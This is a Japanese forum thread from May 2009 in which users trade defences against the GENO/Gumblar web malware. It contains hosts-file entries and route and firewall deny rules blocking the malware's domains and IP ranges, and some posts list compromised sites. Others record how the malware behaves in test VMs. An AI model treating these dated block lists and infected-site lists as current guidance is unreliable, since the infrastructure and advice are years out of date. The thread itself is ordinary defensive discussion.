868192.168.0.774:2009/05/18(月) 11:56:55 ID:lbjdJxFz0
>>855
さらにビビリな人はcookieSafeとか使って、cookieも許可制にしておく。
普通に手動で設定もできるけどcookiesafeだとステータスバーとかからボタン押すだけなので設定が楽。
869192.168.0.774:2009/05/18(月) 11:58:32 ID:yKeLT0rF0
クッキー設定は常に高だぜ。
クッキー要のところでしょっちゅう躓いてるわorz
870192.168.0.774:2009/05/18(月) 12:03:15 ID:834BtslA0
>>861
初心者まとめの方の管理者です。
あまりねらっぽくないように作ったつもりなので(ギコナビとか見えるけど)リンクしても大丈夫だと思います。
不安を煽るような文章がないかどうか、分かりにくいところなどがありましたら連絡よろしくお願いします。
871192.168.0.774:2009/05/18(月) 12:04:57 ID:+JwqLcuL0
hostsファイルは#出始まるのはコメント扱いになるんですよね?
てことは自分でわかるようにメモ書きしても大丈夫ですか

# GENOウイルス対策5月18日
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
872192.168.0.774:2009/05/18(月) 12:07:57 ID:yKeLT0rF0
>>871
俺もそうしてる
873192.168.0.774:2009/05/18(月) 12:09:44 ID:wU1qChfhP
>>871
うん
それと127.0.0.1より0.0.0.0の方が精神衛生上安全じゃね
874192.168.0.774:2009/05/18(月) 12:11:12 ID:+JwqLcuL0
>>872-873
ありがとうございます、書き換えときます
875192.168.0.774:2009/05/18(月) 12:14:41 ID:gw0F+TVl0
>>871
ttp://geno.2ch.tc/

ここみると1つだけなんだけど、3つ入れた方がいいの?
876192.168.0.774:2009/05/18(月) 12:21:44 ID:+m52NSIq0
>>870
ありがとうございます。
877192.168.0.774:2009/05/18(月) 12:23:02 ID:wU1qChfhP
>>875
3つとも入れた方が安全だけど
そんな事より JavaScript(flash) を切っとくべき
最新で安全か分からんし
878192.168.0.774:2009/05/18(月) 12:26:53 ID:7eAX9wM+0
ただいま産業
879192.168.0.774:2009/05/18(月) 12:30:33 ID:eM8L/6820
難読化スクリプトにに google Chrome は除外するように書いてあるんですね
怪しいサイトをgoogleに自動送信されるのを避けるためか?
880192.168.0.774:2009/05/18(月) 12:43:02 ID:NNK7xlMd0
とりあえずブラウズする場合は火狐にNoscript入れときゃいい話だろ?
そこまであわてる話じゃない
881192.168.0.774:2009/05/18(月) 13:00:59 ID:ua7Ctj4Z0
>>875
現在使用されているのは martuz.cn なので、それだけ入ってればいい。
前の2つはおまじない。

またドメイン変更される可能性は十分あるし、(無いとは思うが)前の名前に戻される可能性もあるので
履歴みたいなもんだが、のこしといていいよ。実害ないし。
882192.168.0.774:2009/05/18(月) 13:06:08 ID:gw0F+TVl0
>>877
>>881
ありがとう、おまじないも含め3つ入れときます
883192.168.0.774:2009/05/18(月) 13:06:43 ID:+m52NSIq0
感染していないPCなら、最低限これやっとけば今の所は安心。

・Windows Update(Microsoft Update)をして、システムを最新の状態にする。

・Adobe Reader を最新(9.1.1)にするか、アンインストールする。
最新にした場合→[編集(E)] -> [環境設定(N)...] -> [JavaScript] -> [Acrobat JavaScript を使用(J)]のチェックを外す。

・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。

・ブラウザを Firefox に統一し、NoScript(アドオン)を導入する。
(もしくは、[ツール(T)] -> [オプション(O)...] -> [コンテンツ] -> [JavaScript を有効にする(J)]のチェックを外す。

・C:\WINDOWS\system32\drivers\etc にある hosts ファイルに以下を追加
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
884192.168.0.774:2009/05/18(月) 13:07:00 ID:eM8L/6820
>>881
烏骨鶏と出版社には連絡できたのでしょうか?
未だに放置されてるようなので
885192.168.0.774:2009/05/18(月) 13:07:12 ID:qnzegN6T0
ここはやっぱまったりしてんな
886192.168.0.774:2009/05/18(月) 13:07:21 ID:ua7Ctj4Z0
感染サイトを拾っていて気付いたこと。

<body>とか<BODY>だと、スクリプトが挿入されているが、<BODY bgcolor=#dddddd>のように記載されている
ページに限っては、感染者のサイトであってもスクリプトが挿入されていない。

まかりまちがって気づかないうちに感染した時対策のおまじないとしてはありかもしれん。
phpとかjsも使ってるページだと、おまじないのしようがないけど。
887192.168.0.774:2009/05/18(月) 13:07:36 ID:+m52NSIq0
他スレへの注意喚起コピペ用を作成してみました。
888192.168.0.774:2009/05/18(月) 13:08:28 ID:ua7Ctj4Z0
>>884
連絡は入れてあるけど、担当者が読んだかどうかは知らない。
(出版社は、アドレスわからなかったので、サーバー管理者の方のabuse窓口に送った)
889192.168.0.774:2009/05/18(月) 13:10:08 ID:ua7Ctj4Z0
>>886
訂正…ごめん、そのおまじない無効だわ。その形式でも入ってるページあった。orz
890192.168.0.774:2009/05/18(月) 13:11:31 ID:k2CI1leb0
>>881
cnドメインって20円くらいらしいから、どんどん増殖するんだろうな。
hosts書き換えはお手軽でいいんだけど、以前拾ったスクリプトでは
IPが書き込まれてるものもあったから、hostsだけだと安心できない
んだよね。
891192.168.0.774:2009/05/18(月) 13:12:20 ID:DC1VgNqQ0
>>884
429 名前: ミツバツツジ(北海道)[] 投稿日:2009/05/18(月) 12:48:44.35 ID:EpvayYrU
■ウィルス感染対策済のお知らせ



2009/05/16の朝海外サイトからの攻撃でウィルスを仕込まれご心配をおかけしましたが
すべてクリアし、また対策も済んでおりますのでご安心ください。

http://www.seibidoshuppan.co.jp/new/html/osirase.html
892192.168.0.774:2009/05/18(月) 13:13:55 ID:eM8L/6820
>>888
お手数かけました、ありがとうございます。

最近はお年寄りもインターネットで買い物するようになってきましたが
セキュリティに関しては全く分からないという方が多いと思います。
それで早くサイトを修正してもらわないと、感染者がますます増える気がして
心配しています。
893192.168.0.774:2009/05/18(月) 13:17:13 ID:yKeLT0rF0
>>891
>2009/05/16の朝海外サイトからの攻撃で
海外サイトからの攻撃で。確かにウイルスの入手が自分でも
攻撃と言えば攻撃だが、なんかこうモヤモヤするな
894192.168.0.774:2009/05/18(月) 13:22:26 ID:ABiZoUCL0
あれ?ソース見る限りまだ直ってないみたいだけど……
895192.168.0.774:2009/05/18(月) 13:23:37 ID:bJKwd5tS0
チェッカーでは0%
896192.168.0.774:2009/05/18(月) 13:23:38 ID:xKiO8GiH0
897192.168.0.774:2009/05/18(月) 13:27:49 ID:wU1qChfhP
Opera での flash の切り方

・F12叩く → JavaScriptかプラグインを無効にする
・plugin-ignore.ini(C:\Program Files\Opera\defaults\) を開いて以下を追加
 NPSWF32.dll = flash

flash だけ切りたい人は下、そうでない人は上の方法で
898192.168.0.774:2009/05/18(月) 13:28:04 ID:xSUvMAHu0
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

これをそのままコピペすればいいんですか?
hostsファイル中開いたら既にえらいたくさん指定してあったんですが
一番下に付け加えればいいんでしょうか
899192.168.0.774:2009/05/18(月) 13:28:08 ID:ABiZoUCL0
ああ、キャッシュ見てたわ
これは失敬
900192.168.0.774:2009/05/18(月) 13:28:26 ID:lbjdJxFz0
>>894
キャッシュ見てるんじゃない?
ソース見てきたけど、それっぽいのなかったですが
901192.168.0.774:2009/05/18(月) 13:30:12 ID:rNK1DQEo0
>>896
findyourbigwhy.cn
bigtopsuper.cn

このへんもhostsにつっこむべきかなあ
902192.168.0.774:2009/05/18(月) 13:32:18 ID:xKiO8GiH0
>>901
自分はhostsへの書き込み方解んない初心者に近いから
とりあえずFWへ突っ込んどいたよ
これから一応htaccessにも記入するとこ
903192.168.0.774:2009/05/18(月) 13:32:24 ID:+m52NSIq0
>>898
127.0.0.1 localhost   の下でいいよ
904192.168.0.774:2009/05/18(月) 13:32:47 ID:ua7Ctj4Z0
seibidoshuppan の件

WebARENA Suite 担当者より返答。

>現在の状況、およびウイルスの対策につきまして該当ホームページの
>管理者さまへは連絡をさせて頂き、改善のご検討並びにご対応をいただいております。
905192.168.0.774:2009/05/18(月) 13:33:55 ID:rNK1DQEo0
>>902
うーん
いっそ .cnを全部遮断したい
906192.168.0.774:2009/05/18(月) 13:34:34 ID:xSUvMAHu0
>903
ありがとうございます
907192.168.0.774:2009/05/18(月) 13:34:56 ID:iven4hyc0
【緊急】ウイルス感染について2009年5月16日 投稿者: 雪町灯之助
sprnv。xii。jp/
doris。xii。jp/
から始まるURLにアクセスなさらないようによろしくお願いいたします。
908192.168.0.774:2009/05/18(月) 13:35:41 ID:DLMrt4rx0
ファイアウォールの設定よりhostsのがよほどわかりやすいと思うけどなぁ
突っ込めば遮断なんて死ぬほど明解
909192.168.0.774:2009/05/18(月) 13:36:58 ID:JmCcr4Q60
>>905
ネトゲ関係で垢ハック流行ってるから中国韓国台湾はデフォで全部弾いてるな(PG2利用)
910192.168.0.774:2009/05/18(月) 13:37:43 ID:ua7Ctj4Z0
(スクリプト確認:管理者にメール済み)
p://www■geocities■jp/themusasi/
p://www■geocities■jp/themusasi2/
(同じ管理者と思われるがスクリプトなし)
p://www■geocities■jp/themusasi2de/
p://www■geocities■jp/themusasi4/

(他のスレで感染サイトとして出ていたが、スクリプト見当たらず。ガセ)
p://zaq■ne■jp
p://okwave■jp/qa1152486■html
911192.168.0.774:2009/05/18(月) 13:38:23 ID:wU1qChfhP
>>908
FWとhostsは全く別物だけどな
hostsは遮断してる訳じゃないだろ
912192.168.0.774:2009/05/18(月) 13:40:20 ID:ua7Ctj4Z0
>>907
上、接続失敗
下、ウイルス横行の為閉鎖中。閉鎖告知にはスクリプトなし。
913192.168.0.774:2009/05/18(月) 13:44:13 ID:ua7Ctj4Z0
>>908
IP遮断:ドメイン名で書かれていても、IPの数字でも遮断する。
     DDNSなどで、ドメイン名に割当てられているIPが変化すると、同じ名前のサイトでもブロックできないことがある。
hosts:DNSサーバーより優先して参照され、ドメイン→IPへの変換を行なう。
    登録してあれば、該当サイトの代わりに自PC(もしくは登録してある別のIP)を見に行くようになる。

安全のためには、両方設定しておくのが基本。

>>909
(・∀・)人(・∀・)ナカーマ
914192.168.0.774:2009/05/18(月) 13:44:30 ID:rNK1DQEo0
>>909
マジか
.cnなんて普通要らないし設定してこようかな
915192.168.0.774:2009/05/18(月) 13:45:06 ID:oyOEXJA00
>>911
ルーティングされないから、遮断と一緒だよ。
FWと原理は違うけど。
916192.168.0.774:2009/05/18(月) 13:47:15 ID:+OaLYMxp0
>>883
zlkon.lv時代はIPで投下されていたから
hostsへの記載は無駄な気もする。

>>908
ワイルドカード使えないのがな…。example.comを書いても
foo.example.comやbar.example.comは阻止できない。
917192.168.0.774:2009/05/18(月) 13:49:11 ID:iven4hyc0
>>912
THX!
918192.168.0.774:2009/05/18(月) 13:49:26 ID:wWVwQ3nP0
検証の方、乙です。
自分のノートパソコンもどうやら餌食になってしまったみたいなので、
現在バックアップとってリカバリー準備中です。
大分落ち着いてきたぞ!
919192.168.0.774:2009/05/18(月) 13:51:10 ID:PjPI1FGb0
確かにIPレベルで通信されたらhostsに書いてても意味無いね。
FWで止める方が確実か。
920192.168.0.774:2009/05/18(月) 13:52:18 ID:lbjdJxFz0
hosts fw ルータ の3段で防げばかなり強固
921192.168.0.774:2009/05/18(月) 13:53:48 ID:XBZCbjSj0
.cn全弾きってできないの?
922192.168.0.774:2009/05/18(月) 13:55:28 ID:oyOEXJA00
こんな方法もある。
route -p add 95.129.144.0 mask 255.255.254.0 127.0.0.1
923192.168.0.774:2009/05/18(月) 14:01:55 ID:JmCcr4Q60
>>920
その三段構えが鉄板だね。こまめにメンテしなきゃ意味無いけどw
924604:2009/05/18(月) 14:02:44 ID:1VMrtiIH0
ウィンドウズモバイルで怪しいサイト踏むって言ってた者だけど
http://genolists.alink.uic.to/
にあるサイト片っ端から行ってみた。
結果
とりあえず問題ないっぽいが、接続切ってブラウザ閉じた後に2回ほど携帯が勝手に接続しようとして失敗した旨のエラーメッセージ確認。
携帯自身のエラーなのかウィルスなのかわからんのでなんともいえん。
ウィンドウズOSの入った機械でアクセスするのは控えたほうがいいかもしれん。

皆さんの協力感謝です。
あと、仮眠とった後PCにWin7をクリーンインスコ&イーモバイルで再接続したからID変わってるかも
これで自分の人柱報告は終わろうと思います。

925192.168.0.774:2009/05/18(月) 14:03:02 ID:t3VCyTRM0
FWはZoomAlearmでおk?
926192.168.0.774:2009/05/18(月) 14:05:47 ID:j9Y4xggD0
>>922
ルーティングテーブルか、その方法もあったな
927192.168.0.774:2009/05/18(月) 14:07:26 ID:oyOEXJA00
>>926
この方法なら、とりあえずソフトいらないよ。
928192.168.0.774:2009/05/18(月) 14:09:16 ID:lXGw6ssR0
adobe readerのアップデートが8.15で最新になるんですが
最新版は9ですよね?
929192.168.0.774:2009/05/18(月) 14:11:40 ID:UxU4hqfi0
930192.168.0.774:2009/05/18(月) 14:12:44 ID:oyOEXJA00
>>928
8 系の最新は、8.1.5
9 系の最新は、9.1.1

どちらも、セキュリティホールはつぶれているので安心してOK
931192.168.0.774:2009/05/18(月) 14:16:20 ID:oMiyEi290
うちはDNSサーバにダミーエントリいれて、サブドメインごとまとめてブロックした
zone "zlkon.lv" {
    type master;
    file "zone\block.zone";
};
zone "gumblar.cn" {
    type master;
    file "zone\block.zone";
};
zone "martuz.cn" {
    type master;
    file "zone\block.zone";
};
932192.168.0.774:2009/05/18(月) 14:16:36 ID:lXGw6ssR0
>>929>>930
有り難うございます
933192.168.0.774:2009/05/18(月) 14:18:39 ID:pVOaBjI60
Adobe Flash Playerがアップデートできないんですが
これはアップデート時はActiveXやJavaScriptを有効にしないといけないんでしょうか
934192.168.0.774:2009/05/18(月) 14:18:52 ID:k2CI1leb0
これ、本当かね?
あとで検証してみるか。

671 名無しさん@お腹いっぱい。 sage 2009/05/18(月) 14:15:47 ID:
>>617
これVMで踏んでみたけど、確かに軽くなってるし、コマンドプロンプトも
レジストリエディタも立ち上がる。
chmファイルはなにやら更新されていく。
935192.168.0.774:2009/05/18(月) 14:19:48 ID:j9Y4xggD0
>>931
自前のDNSサーバーを持ってるってこと?
936192.168.0.774:2009/05/18(月) 14:21:14 ID:oyOEXJA00
>>931
微妙にスレチだが・・・
file "/dev/null"; でOK
937192.168.0.774:2009/05/18(月) 14:21:28 ID:XTSMt63n0
>>922
なるほどねぇ。ありがとうございます。
938192.168.0.774:2009/05/18(月) 14:23:58 ID:k2CI1leb0
>>936
でも、zoneファイルで逆引きを定義しておかないとhosts書くのと
大差ない気がする。
939192.168.0.774:2009/05/18(月) 14:26:12 ID:hvJT/vJv0
こういう騒動がある度に覗くけど
お前らすげえな素人の俺にはさっぱりだ
940192.168.0.774:2009/05/18(月) 14:28:17 ID:oyOEXJA00
>>938
hosts も DNS も正引きは同じだからね。
DNS は、逆引きも設定できるけど。

IP アドレスで指定されたら、DNS やドメインによる制御は役に
たたないから、ルーティングとかF/Wで 95.129.144.0/23 への
アクセスを止めてしまった方が、現在のところは有効な気がする。
941192.168.0.774:2009/05/18(月) 14:32:22 ID:PjPI1FGb0
ただ、接続先IP変える位なら簡単に出来るだろうから、
どちらにしても、しばらく情報収集して無いと怖いね。
942192.168.0.774:2009/05/18(月) 14:32:56 ID:wU1qChfhP
一般に役に立たないレスは控えた方がいいじゃないか
DNSサーバーで対策なんて普通ありえんw
943192.168.0.774:2009/05/18(月) 14:33:37 ID:abbvkkL50
今日初めてhostsを知った情弱の俺でも、hostsをいじる事ができた。
これはPC詳しくない人間にはやりやすい対策かもしれないね。
944192.168.0.774:2009/05/18(月) 14:36:14 ID:k2CI1leb0
>>942
逆に、ヤバ気なところを片っ端から登録したDNSを立てて、
それを使ってもらうというのもありかもしれん。

って、たぶんgnome氏が「身内」に提供してるのがまさに
そういうもんなんだろうな。
945192.168.0.774:2009/05/18(月) 14:37:31 ID:j9Y4xggD0
>>943
XPは簡単にできるけれどVistaはアクセス権がらみで手軽に書き換えられないよ
946192.168.0.774:2009/05/18(月) 14:39:03 ID:t3VCyTRM0
hosts煽ったのなんて広告ブロック以来だ
947192.168.0.774:2009/05/18(月) 14:39:27 ID:PjPI1FGb0
>>944
それ、身内ならいいだろうけど、怖くて使う気になれないと思うんだがw

誘導され放題w
948192.168.0.774:2009/05/18(月) 14:40:01 ID:oMiyEi290
Vista使いだけど、普段は一般ユーザーで使ってるから、ウイルスやワームにやられても
システム書き換えられないようにしてる

hostsファイル書き換えるときは、「メモ帳」を管理者権限で起動して、hostsファイル開いて書き換える
949192.168.0.774:2009/05/18(月) 14:41:07 ID:xKiO8GiH0
>>948
なる程!
ちょっとやってみる!
950192.168.0.774:2009/05/18(月) 14:41:29 ID:oMiyEi290
>>944
インターネット上で匿名のだれかがそんなサービス提供してたら、
逆にYahooやGoogleアクセスしたらウイルス感染サイトのIPアドレスに誘導されるかもわからん
951192.168.0.774:2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。

Vistaでhostsを編集する方法

スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック

「管理者として実行」を選択

「ファイル」メニュー→「開く」

ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更

C:\Windows\System32\drivers\etc\hosts
を開く

以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
952192.168.0.774:2009/05/18(月) 14:46:04 ID:k2CI1leb0
>>947
確かにそうだなw
そのDNSがやられたら一蓮托生だし。
953192.168.0.774:2009/05/18(月) 14:46:49 ID:j9Y4xggD0
>>951
良いテンプレGJ
954192.168.0.774:2009/05/18(月) 14:50:12 ID:j9Y4xggD0
>>948
加えてバッファ オーバーフロー対策にどうですか
XPSP2以上用の解説ですがVistaも同様です
ttp://support.microsoft.com/kb/889741/ja
(通常で不安定なPCにはおすすめでないですが)
955不安な初心者:2009/05/18(月) 14:50:14 ID:duvNIOfD0
皆さんに質問。テンプレセキュリティサイトの焼却炉の数字をPG2に登録したんですけど
焼却炉の数字を数字を登録するでGENO対策になってますよね?
956192.168.0.774:2009/05/18(月) 14:53:50 ID:ua7Ctj4Z0
p://park17■wakwak■com/~kitagawadaisuke/

感染を確認。HP管理者の連絡先不明のため、サーバー管理者に連絡済み。
957192.168.0.774:2009/05/18(月) 14:57:07 ID:eM8L/6820
85.214.90.254 これどうするかなぁ・・独り言
めんどくさいから全焼きしとくか
85.214.16.0 - 85.214.139.255
85.214.0.0/16 
958192.168.0.774:2009/05/18(月) 14:59:08 ID:dRkGHa1G0
>>955
リストとしてきちんと登録されていれば現状は対策になっていると思うよ
959192.168.0.774:2009/05/18(月) 14:59:34 ID:ImVScTUk0
XP SP3遣いっす。
不安なんで教えてください。

C:\WINDOWS\system32\drivers\etcにあるhostファイルの最後に

#090518 zlkon, GENO malware
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
127.0.0.1 findyourbigwhy.cn
127.0.0.1 bigtopsuper.cn

を追加しときました。
これでhostsファイルはおっけーですか?
960192.168.0.774:2009/05/18(月) 15:02:13 ID:8q4bxpc+0
>>951
ありがとう!

昨日半年ぶりくらいにログインしたmixiにGENOの事書いたら
腐の方達からすごい質問攻め
「自分もよく解らないのでまとめwiki見たほうがいいですよ」と返信したら
二人程から
「なら書くな!」


泣いていい?
961192.168.0.774:2009/05/18(月) 15:02:24 ID:BZ5+cjSr0
>>454
それ英語版ファイルだから無問題ってことで俺の中では脳内変換されてる。
962192.168.0.774:2009/05/18(月) 15:04:56 ID:BZ5+cjSr0
>>469
俺のVista機だと
日本語50727バイト
英語46133バイト
963192.168.0.774:2009/05/18(月) 15:05:24 ID:k2CI1leb0
>>960
なんかよくわからんが、存分に泣くがいい。
964192.168.0.774:2009/05/18(月) 15:05:43 ID:gw0F+TVl0
>>960
www
965192.168.0.774:2009/05/18(月) 15:07:07 ID:xKJ07MeN0
>>960
怖いのう怖いのう
966192.168.0.774:2009/05/18(月) 15:08:01 ID:wU1qChfhP
>>960の人気に嫉妬
967192.168.0.774:2009/05/18(月) 15:08:46 ID:t3VCyTRM0
>>960
一緒に泣いてやるよ
968192.168.0.774:2009/05/18(月) 15:09:50 ID:oMiyEi290
>>954
普段は一般ユーザーで利用、DEPは全アプリでオン、IE8は保護モード動作、と一通りやってますよ
969192.168.0.774:2009/05/18(月) 15:10:14 ID:8q4bxpc+0
>>963-967
みんな ありがとう
本当に優しいな


俺、検証も人柱もできないけど、これだけは言いたい


mixiに書いちゃだめ
970192.168.0.774:2009/05/18(月) 15:10:37 ID:ImVScTUk0
       ○
       ノ|)
  _| ̄|○ <し
    ↑
   >>960
971192.168.0.774:2009/05/18(月) 15:11:42 ID:qG7NJCuDO
おー ウイルスリンク集続々と集まってるね
俺も帰ったらサブPCで怪しいとこ特攻するわ
同人は東方とボーカロイドが特に危ないんだよな?
972192.168.0.774:2009/05/18(月) 15:15:35 ID:v0TdaQEv0
今までセキュリティはソフトにおまかせだけだったので、先人の皆さんに感謝です。
>>2の1.から4.までは比較的楽にできました。
「5.危険IPのブロック」はレスを参考に以下のようにやってみました。

hostsに3つのドメインを127.0.0.1で入れ、さらにIPでもはじくようにと思い、
ググってリンクたどって一番分かりやすかったのが・・・
「Kaspersky Internet Security 2009 通信を遮断するアドレスを範囲指定する方法」
自分がカスペ最近使い始めたのもあるんですが、これを見ながら
94.229.64.0/20(zlkon.lvに割り当てられていた範囲)と
95.129.144.0/23(martuz.cnとgumblar.cnに割り当てられていた範囲)を
カスペにFW設定してみました。
findyourbigwhy.cnとbigtopsuper.cnはカスペでドメイン名のFW遮断設定だけしましたが、
IP範囲ではどういう設定すべきか、>>957さん同様考え中です。
973192.168.0.774:2009/05/18(月) 15:18:40 ID:ihTs5Cw90
>>969
誰だったらそういう奴らに広めてやるわ
やらないけど
974192.168.0.774:2009/05/18(月) 15:19:28 ID:9Pl8YtKN0
>>969
謎の文字列はまだかね?
975192.168.0.774:2009/05/18(月) 15:20:58 ID:j9Y4xggD0
>>968
あぁDNSサーバー使いの人だったのですか
レスを読み返すと対策はかなり完璧じゃないですか
976192.168.0.774:2009/05/18(月) 15:22:25 ID:LQfReDty0
同人サイトって、同人誌出してるような絵描きのサイトのことなのか?
977192.168.0.774:2009/05/18(月) 15:26:15 ID:oyOEXJA00
>>957
allow 85.214.0.0/20
deny 85.214.0.0/16

ってポリシーでどう?
978192.168.0.774:2009/05/18(月) 15:27:31 ID:AGzlLrAA0
>>5
カスペでも検知できるって聞いたんだけどavastの方がいいの?
979192.168.0.774:2009/05/18(月) 15:27:45 ID:jXgQJsa10
デルのPC XPで感染してしまったようです。
再インストールしたかったのですが、セットアップ途中で反応無し
デルのサポートセンターの答えは、HD故障の疑いで現在検査中
1時間くらい掛かるということでしたが、5時間半経過でまだ56%
感染&HD故障がたまたま重なったと言うことなのでしょうか?
980192.168.0.774:2009/05/18(月) 15:27:48 ID:gw0F+TVl0
通称「GENOウイルス」・同人サイト向け対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/pages/24.html

にある
ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定

ですが

ttp://esupport.trendmicro.co.jp/Pages/JP-2063926.aspx
の注意書きにある

注意:
例外ルール設定に、トロイの木馬が使用するプロトコルとポート番号を設定した場合については
トロイの木馬アタックを防ぐことができません。
例外ルール設定の追加に関しましては、お客様の自己責任でおこなっていただきますよう
お願いいたします。

のとおりトロイの木馬は防げませんってサポートが言ってました
981192.168.0.774:2009/05/18(月) 15:27:50 ID:oyOEXJA00
>>977 の訂正
allow 85.214.0.0/20
allow 85.214.240.0/20
deny 85.214.0.0/16
982192.168.0.774:2009/05/18(月) 15:34:43 ID:k2CI1leb0
さっきから最新?のGenoを飼ってるんだけど、>>401あたりからの情報通り、
普通にオペレーションできてしまう。
qlsodbc.chm以外にわかりやすい判定方法がないぞ、これ。

しばらく動かしたままにしてるんだけど、サイズは1,323バイトのまま変化せず。
中身はASCIIテキストで謎の文字列。
サイズが変わったとかハッシュがどうこうではなく、chmファイルをダブルクリック
して開けなければ感染してる。

別のVMで他のサイトから感染させてみて、文字列が変わるかどうか調べてみるか。
983192.168.0.774:2009/05/18(月) 15:41:11 ID:+lw3mpsu0
FTPしないとサイズ変わらないのかな。
どこかの anonymous サーバにテストFTPしてみるとかどうだろう?
984192.168.0.774:2009/05/18(月) 15:45:21 ID:j9Y4xggD0
>>980
トロイの木馬が使用するプロトコルとポート番号を(例外ルールで通信の許可)設定した場合は防げないってことでは?
ファイル共有などで誤って、トロイの木馬ポートを許可設定した場合だと思うけれどどうだろう
985192.168.0.774:2009/05/18(月) 15:50:31 ID:8GKrEP5/O
ちょwwwwwww手ぶろ感染ってまじ?wwwwwww
986192.168.0.774:2009/05/18(月) 15:50:51 ID:ua7Ctj4Z0
p://pmpk■dojin■com 感染報告のメールに対し、対応完了の返答あり。完了してるかの確認まではやってない。
987192.168.0.774:2009/05/18(月) 15:51:00 ID:BEaSjZsm0
genoに感染、再起動後にregeditを起動しようとしてもエクスプローラー再起動みたくなって
起動できないけど
regedit.exeをa.exeのような適当な名前に変えて実行すると正常に起動できる
その後、ファイル名を元のregedit.exeに戻しても普通に起動できるようになった
988192.168.0.774:2009/05/18(月) 15:52:34 ID:k2CI1leb0
>>983
それはやってる。別のVMのftpサーバにアクセスしたけど、変わらない。
sniffingツール等の有無を確認して動作を停止してしまうのかもしれない。
あるいはデバイスを見てVMで実行していることを検知して動作を停止して
いるのかも。
妙に軽く動くのは、このウィルス本来の動作を行っていないからという
可能性がある。

とりあえずすっぴんのVMで試してみて、駄目ならネットブックでも
使ってみようかと。
989192.168.0.774:2009/05/18(月) 15:53:34 ID:o7Ns7JFwP
>>969
mixiこわい
990192.168.0.774:2009/05/18(月) 15:55:49 ID:BEaSjZsm0
>>986
パンプキン日記内のgenoスクリプト消し忘れているようだ
991192.168.0.774:2009/05/18(月) 15:57:52 ID:k2CI1leb0
>>987
それは実機?
992192.168.0.774:2009/05/18(月) 15:59:16 ID:gw0F+TVl0
>>984
俺も処理を「許可」にした場合はってことだと思うんだけど
サポートの不慣れな姉さんはトロイの木馬は防げませんの一点張りw

じゃあなんのための設定なのかとwww
993192.168.0.774:2009/05/18(月) 16:00:05 ID:BEaSjZsm0
>>991
仮想
994192.168.0.774:2009/05/18(月) 16:00:30 ID:wU1qChfhP
>>988
>デバイスを見てVMで実行していることを検知して
さらりと怖いこと言うね
995192.168.0.774:2009/05/18(月) 16:04:13 ID:k2CI1leb0
>>993
そっか。ってことは別種なのかな。こっちはregeditもExplorerもcmd.exeも
普通に動く。

>>994
実際、ラボでの検証をすり抜けるために、VM特有のデバドラをチェックする
ウィルスがあるらしいからねぇ。
996192.168.0.774:2009/05/18(月) 16:07:25 ID:r4h+PdSAO
手ブロが感染とは、どこのスレがソースですか
997192.168.0.774:2009/05/18(月) 16:07:37 ID:BZ5+cjSr0
この件で何の役にも立たない俺だけど、次スレ立ててくるわ
998192.168.0.774:2009/05/18(月) 16:08:27 ID:Re7/n4dW0
>>996
情弱の同人板では問題ないと判断されてた
999192.168.0.774:2009/05/18(月) 16:08:42 ID:j9Y4xggD0
>>992
萌え萌えなお姉さんだ・・・
1000192.168.0.774:2009/05/18(月) 16:09:05 ID:rNK1DQEo0
>>996
VIP
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。